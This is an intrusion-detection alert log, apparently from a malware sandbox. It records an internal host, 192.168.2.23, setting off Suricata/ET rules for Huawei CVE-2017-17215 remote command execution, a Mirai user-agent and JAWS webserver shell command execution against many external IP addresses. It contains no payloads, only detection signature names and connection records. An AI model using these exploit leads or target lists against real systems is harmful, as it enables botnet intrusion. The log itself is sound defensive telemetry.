                                                    2024-12-03T23:02:16.931214+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234165641.204.44.5137215TCP
                                                    2024-12-03T23:02:16.931396+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235966040.208.105.23580TCP
                                                    2024-12-03T23:02:16.931396+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235966040.208.105.23580TCP
                                                    2024-12-03T23:02:16.931589+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233867057.16.75.1880TCP
                                                    2024-12-03T23:02:16.931589+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233867057.16.75.1880TCP
                                                    2024-12-03T23:02:16.931689+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233394241.243.122.20937215TCP
                                                    2024-12-03T23:02:16.946830+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2358952197.213.172.17437215TCP
                                                    2024-12-03T23:02:16.946977+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233988441.223.100.16437215TCP
                                                    2024-12-03T23:02:16.947073+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2358152156.177.86.19537215TCP
                                                    2024-12-03T23:02:16.947195+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234524041.34.236.13237215TCP
                                                    2024-12-03T23:02:16.956041+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2360102156.199.249.20937215TCP
                                                    2024-12-03T23:02:16.960300+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2341356197.7.151.13237215TCP
                                                    2024-12-03T23:02:16.962493+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2352416140.3.1.8280TCP
                                                    2024-12-03T23:02:16.962493+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2352416140.3.1.8280TCP
                                                    2024-12-03T23:02:16.978015+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2332814219.81.41.17380TCP
                                                    2024-12-03T23:02:16.978015+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2332814219.81.41.17380TCP
                                                    2024-12-03T23:02:16.987336+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2355660197.174.22.10937215TCP
                                                    2024-12-03T23:02:16.987460+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2333060156.191.133.12137215TCP
                                                    2024-12-03T23:02:16.987560+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2353180156.1.156.16137215TCP
                                                    2024-12-03T23:02:17.038096+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2341106197.32.245.13637215TCP
                                                    2024-12-03T23:02:17.151827+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.236072661.110.206.2180TCP
                                                    2024-12-03T23:02:17.151827+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.236072661.110.206.2180TCP
                                                    2024-12-03T23:02:17.174881+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2348142152.212.240.18880TCP
                                                    2024-12-03T23:02:17.174881+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2348142152.212.240.18880TCP
                                                    2024-12-03T23:02:17.197377+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333208173.72.159.11180TCP
                                                    2024-12-03T23:02:17.197377+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2333208173.72.159.11180TCP
                                                    2024-12-03T23:02:17.197580+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2354382198.165.232.5280TCP
                                                    2024-12-03T23:02:17.197580+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2354382198.165.232.5280TCP
                                                    2024-12-03T23:02:17.197641+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2358878109.62.119.780TCP
                                                    2024-12-03T23:02:17.197641+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2358878109.62.119.780TCP
                                                    2024-12-03T23:02:17.206393+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2349510173.230.32.4680TCP
                                                    2024-12-03T23:02:17.206393+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2349510173.230.32.4680TCP
                                                    2024-12-03T23:02:17.206500+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350164102.137.240.13480TCP
                                                    2024-12-03T23:02:17.206500+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2350164102.137.240.13480TCP
                                                    2024-12-03T23:02:17.237570+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2336248201.125.207.17180TCP
                                                    2024-12-03T23:02:17.237570+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2336248201.125.207.17180TCP
                                                    2024-12-03T23:02:17.253134+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2345998153.78.233.7980TCP
                                                    2024-12-03T23:02:17.253134+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2345998153.78.233.7980TCP
                                                    2024-12-03T23:02:17.275064+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233556678.65.198.15080TCP
                                                    2024-12-03T23:02:17.275064+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233556678.65.198.15080TCP
                                                    2024-12-03T23:02:17.282056+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2344888197.232.54.24337215TCP
                                                    2024-12-03T23:02:17.290619+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23556308.255.164.12880TCP
                                                    2024-12-03T23:02:17.290619+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.23556308.255.164.12880TCP
                                                    2024-12-03T23:02:17.306364+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2352372175.75.70.5480TCP
                                                    2024-12-03T23:02:17.306364+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2352372175.75.70.5480TCP
                                                    2024-12-03T23:02:17.310407+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2357092197.218.205.13337215TCP
                                                    2024-12-03T23:02:17.315466+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2348998176.1.7.980TCP
                                                    2024-12-03T23:02:17.315466+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2348998176.1.7.980TCP
                                                    2024-12-03T23:02:17.315648+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2349178124.224.219.16880TCP
                                                    2024-12-03T23:02:17.315648+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2349178124.224.219.16880TCP
                                                    2024-12-03T23:02:17.315809+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2357802137.224.169.14180TCP
                                                    2024-12-03T23:02:17.315809+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2357802137.224.169.14180TCP
                                                    2024-12-03T23:02:17.321804+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2354236208.132.145.17980TCP
                                                    2024-12-03T23:02:17.321804+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2354236208.132.145.17980TCP
                                                    2024-12-03T23:02:17.331101+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2337594159.108.60.22680TCP
                                                    2024-12-03T23:02:17.331101+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2337594159.108.60.22680TCP
                                                    2024-12-03T23:02:17.331226+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2340114212.53.111.20880TCP
                                                    2024-12-03T23:02:17.331226+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2340114212.53.111.20880TCP
                                                    2024-12-03T23:02:17.363064+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233555885.42.189.13780TCP
                                                    2024-12-03T23:02:17.363064+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233555885.42.189.13780TCP
                                                    2024-12-03T23:02:17.363187+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356716173.230.39.23580TCP
                                                    2024-12-03T23:02:17.363187+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2356716173.230.39.23580TCP
                                                    2024-12-03T23:02:17.378073+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359728105.172.5.16880TCP
                                                    2024-12-03T23:02:17.378073+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2359728105.172.5.16880TCP
                                                    2024-12-03T23:02:18.044631+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2354064197.191.214.2037215TCP
                                                    2024-12-03T23:02:18.132988+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2345092163.172.255.11880TCP
                                                    2024-12-03T23:02:18.132988+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2345092163.172.255.11880TCP
                                                    2024-12-03T23:02:18.185218+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234969668.152.141.25180TCP
                                                    2024-12-03T23:02:18.185218+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234969668.152.141.25180TCP
                                                    2024-12-03T23:02:18.197973+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2339326117.50.49.12580TCP
                                                    2024-12-03T23:02:18.197973+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2339326117.50.49.12580TCP
                                                    2024-12-03T23:02:18.198194+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233419025.167.5.21480TCP
                                                    2024-12-03T23:02:18.198194+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233419025.167.5.21480TCP
                                                    2024-12-03T23:02:18.198269+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335602144.147.255.22180TCP
                                                    2024-12-03T23:02:18.198269+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2335602144.147.255.22180TCP
                                                    2024-12-03T23:02:18.198354+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2353000203.176.98.17880TCP
                                                    2024-12-03T23:02:18.198354+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2353000203.176.98.17880TCP
                                                    2024-12-03T23:02:18.206712+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2345984141.145.232.22980TCP
                                                    2024-12-03T23:02:18.206712+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2345984141.145.232.22980TCP
                                                    2024-12-03T23:02:18.206899+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356908158.79.170.5880TCP
                                                    2024-12-03T23:02:18.206899+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2356908158.79.170.5880TCP
                                                    2024-12-03T23:02:18.207666+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2347508164.21.186.7280TCP
                                                    2024-12-03T23:02:18.207666+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2347508164.21.186.7280TCP
                                                    2024-12-03T23:02:18.244118+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2356764156.191.36.9337215TCP
                                                    2024-12-03T23:02:18.244288+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2356596197.175.190.9137215TCP
                                                    2024-12-03T23:02:18.275583+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.236063041.206.186.4337215TCP
                                                    2024-12-03T23:02:18.275706+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2357656156.207.68.21737215TCP
                                                    2024-12-03T23:02:18.275819+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2360342156.64.9.16937215TCP
                                                    2024-12-03T23:02:18.316093+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234932041.54.199.19637215TCP
                                                    2024-12-03T23:02:18.316106+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2348012156.33.52.21737215TCP
                                                    2024-12-03T23:02:18.386708+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235424041.92.111.4437215TCP
                                                    2024-12-03T23:02:18.386961+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2345350156.131.234.24537215TCP
                                                    2024-12-03T23:02:18.431348+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338986223.91.116.7580TCP
                                                    2024-12-03T23:02:18.431348+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2338986223.91.116.7580TCP
                                                    2024-12-03T23:02:18.456574+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.236035250.162.207.4380TCP
                                                    2024-12-03T23:02:18.456574+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.236035250.162.207.4380TCP
                                                    2024-12-03T23:02:18.487562+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2347664204.186.97.16580TCP
                                                    2024-12-03T23:02:18.487562+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2347664204.186.97.16580TCP
                                                    2024-12-03T23:02:18.534336+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235379272.71.46.2380TCP
                                                    2024-12-03T23:02:18.534336+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235379272.71.46.2380TCP
                                                    2024-12-03T23:02:18.946946+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2336032156.131.78.12637215TCP
                                                    2024-12-03T23:02:18.947076+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2353578197.221.56.14737215TCP
                                                    2024-12-03T23:02:18.956234+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2360600197.192.25.3637215TCP
                                                    2024-12-03T23:02:19.207436+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2352296209.173.84.4880TCP
                                                    2024-12-03T23:02:19.207436+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2352296209.173.84.4880TCP
                                                    2024-12-03T23:02:19.243795+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234715441.141.61.337215TCP
                                                    2024-12-03T23:02:19.243940+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2336858197.99.153.2037215TCP
                                                    2024-12-03T23:02:19.300052+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2347124197.67.155.1937215TCP
                                                    2024-12-03T23:02:19.384539+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2340346197.159.140.18237215TCP
                                                    2024-12-03T23:02:19.393514+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2342888156.199.133.1037215TCP
                                                    2024-12-03T23:02:19.400154+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233348441.224.91.19637215TCP
                                                    2024-12-03T23:02:19.425289+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234801841.121.183.14337215TCP
                                                    2024-12-03T23:02:19.431410+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2360336207.211.198.1680TCP
                                                    2024-12-03T23:02:19.431410+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2360336207.211.198.1680TCP
                                                    2024-12-03T23:02:19.431575+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335728206.102.146.5780TCP
                                                    2024-12-03T23:02:19.431575+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2335728206.102.146.5780TCP
                                                    2024-12-03T23:02:19.450445+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2352144149.156.227.5180TCP
                                                    2024-12-03T23:02:19.450445+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2352144149.156.227.5180TCP
                                                    2024-12-03T23:02:19.450450+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359710121.249.204.7380TCP
                                                    2024-12-03T23:02:19.450450+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2359710121.249.204.7380TCP
                                                    2024-12-03T23:02:19.456303+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2354492197.240.9.17837215TCP
                                                    2024-12-03T23:02:19.456444+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2351474197.156.215.7937215TCP
                                                    2024-12-03T23:02:19.462673+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2346176173.126.146.7580TCP
                                                    2024-12-03T23:02:19.462673+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2346176173.126.146.7580TCP
                                                    2024-12-03T23:02:19.478249+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2348550128.223.79.23680TCP
                                                    2024-12-03T23:02:19.478249+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2348550128.223.79.23680TCP
                                                    2024-12-03T23:02:20.069121+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2336870156.195.152.12837215TCP
                                                    2024-12-03T23:02:20.384523+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235998841.43.234.1937215TCP
                                                    2024-12-03T23:02:20.400052+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235038241.62.51.4537215TCP
                                                    2024-12-03T23:02:20.431270+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2344558197.22.131.22337215TCP
                                                    2024-12-03T23:02:20.432278+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2358404156.231.12.15437215TCP
                                                    2024-12-03T23:02:20.446878+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2340154197.127.169.4637215TCP
                                                    2024-12-03T23:02:20.447009+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2346322156.40.232.2937215TCP
                                                    2024-12-03T23:02:20.456122+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2346650156.5.80.22537215TCP
                                                    2024-12-03T23:02:20.456205+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2343598197.210.72.137215TCP
                                                    2024-12-03T23:02:20.469923+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233846241.173.232.15137215TCP
                                                    2024-12-03T23:02:20.493843+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234765025.10.197.17480TCP
                                                    2024-12-03T23:02:20.493843+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234765025.10.197.17480TCP
                                                    2024-12-03T23:02:20.525129+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233980041.62.95.1437215TCP
                                                    2024-12-03T23:02:20.525282+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2338652156.105.25.6037215TCP
                                                    2024-12-03T23:02:20.534868+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2334980217.200.202.10180TCP
                                                    2024-12-03T23:02:20.534868+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2334980217.200.202.10180TCP
                                                    2024-12-03T23:02:20.535033+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233807469.189.168.7780TCP
                                                    2024-12-03T23:02:20.535033+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233807469.189.168.7780TCP
                                                    2024-12-03T23:02:20.572308+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2337732131.122.230.580TCP
                                                    2024-12-03T23:02:20.572308+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2337732131.122.230.580TCP
                                                    2024-12-03T23:02:20.572342+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2334218174.54.4.580TCP
                                                    2024-12-03T23:02:20.572342+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2334218174.54.4.580TCP
                                                    2024-12-03T23:02:20.572398+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234970241.140.250.13037215TCP
                                                    2024-12-03T23:02:20.581428+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2352530197.116.252.5737215TCP
                                                    2024-12-03T23:02:20.597030+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235286898.112.149.20480TCP
                                                    2024-12-03T23:02:20.597030+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235286898.112.149.20480TCP
                                                    2024-12-03T23:02:20.597121+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235474041.89.102.22337215TCP
                                                    2024-12-03T23:02:20.597262+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2337208197.57.148.16137215TCP
                                                    2024-12-03T23:02:20.619725+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2347178166.78.173.11680TCP
                                                    2024-12-03T23:02:20.619725+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2347178166.78.173.11680TCP
                                                    2024-12-03T23:02:20.621014+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356348170.169.198.7180TCP
                                                    2024-12-03T23:02:20.621014+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2356348170.169.198.7180TCP
                                                    2024-12-03T23:02:20.675228+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2337954210.121.128.4680TCP
                                                    2024-12-03T23:02:20.675228+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2337954210.121.128.4680TCP
                                                    2024-12-03T23:02:21.650481+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344554143.74.7.1680TCP
                                                    2024-12-03T23:02:21.650481+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2344554143.74.7.1680TCP
                                                    2024-12-03T23:02:21.659546+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235606013.251.158.6580TCP
                                                    2024-12-03T23:02:21.659546+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235606013.251.158.6580TCP
                                                    2024-12-03T23:02:21.675514+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233490865.92.219.1580TCP
                                                    2024-12-03T23:02:21.675514+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233490865.92.219.1580TCP
                                                    2024-12-03T23:02:21.697494+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234376441.140.12.15337215TCP
                                                    2024-12-03T23:02:21.697507+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2339688197.93.17.17137215TCP
                                                    2024-12-03T23:02:21.737720+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2348160197.95.181.14737215TCP
                                                    2024-12-03T23:02:21.737965+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2354318156.16.141.16437215TCP
                                                    2024-12-03T23:02:21.784393+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235987241.224.43.9437215TCP
                                                    2024-12-03T23:02:21.784774+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235764241.194.8.2437215TCP
                                                    2024-12-03T23:02:21.822140+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2355196199.52.65.1180TCP
                                                    2024-12-03T23:02:21.822140+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2355196199.52.65.1180TCP
                                                    2024-12-03T23:02:21.822342+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2336620207.42.102.16280TCP
                                                    2024-12-03T23:02:21.822342+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2336620207.42.102.16280TCP
                                                    2024-12-03T23:02:21.831349+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233409893.111.230.10280TCP
                                                    2024-12-03T23:02:21.831349+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233409893.111.230.10280TCP
                                                    2024-12-03T23:02:21.848879+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235510250.206.223.17080TCP
                                                    2024-12-03T23:02:21.848879+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235510250.206.223.17080TCP
                                                    2024-12-03T23:02:21.878154+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2340278176.0.211.14380TCP
                                                    2024-12-03T23:02:21.878154+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2340278176.0.211.14380TCP
                                                    2024-12-03T23:02:21.878403+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233702258.165.207.16680TCP
                                                    2024-12-03T23:02:21.878403+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233702258.165.207.16680TCP
                                                    2024-12-03T23:02:22.478471+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2341306126.82.92.6580TCP
                                                    2024-12-03T23:02:22.478471+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2341306126.82.92.6580TCP
                                                    2024-12-03T23:02:22.478574+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235174660.161.100.7880TCP
                                                    2024-12-03T23:02:22.478574+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235174660.161.100.7880TCP
                                                    2024-12-03T23:02:22.494057+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2337636208.48.134.7280TCP
                                                    2024-12-03T23:02:22.494057+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2337636208.48.134.7280TCP
                                                    2024-12-03T23:02:22.503362+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2334032119.237.14.23480TCP
                                                    2024-12-03T23:02:22.503362+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2334032119.237.14.23480TCP
                                                    2024-12-03T23:02:22.509479+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235372449.191.180.5080TCP
                                                    2024-12-03T23:02:22.509479+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235372449.191.180.5080TCP
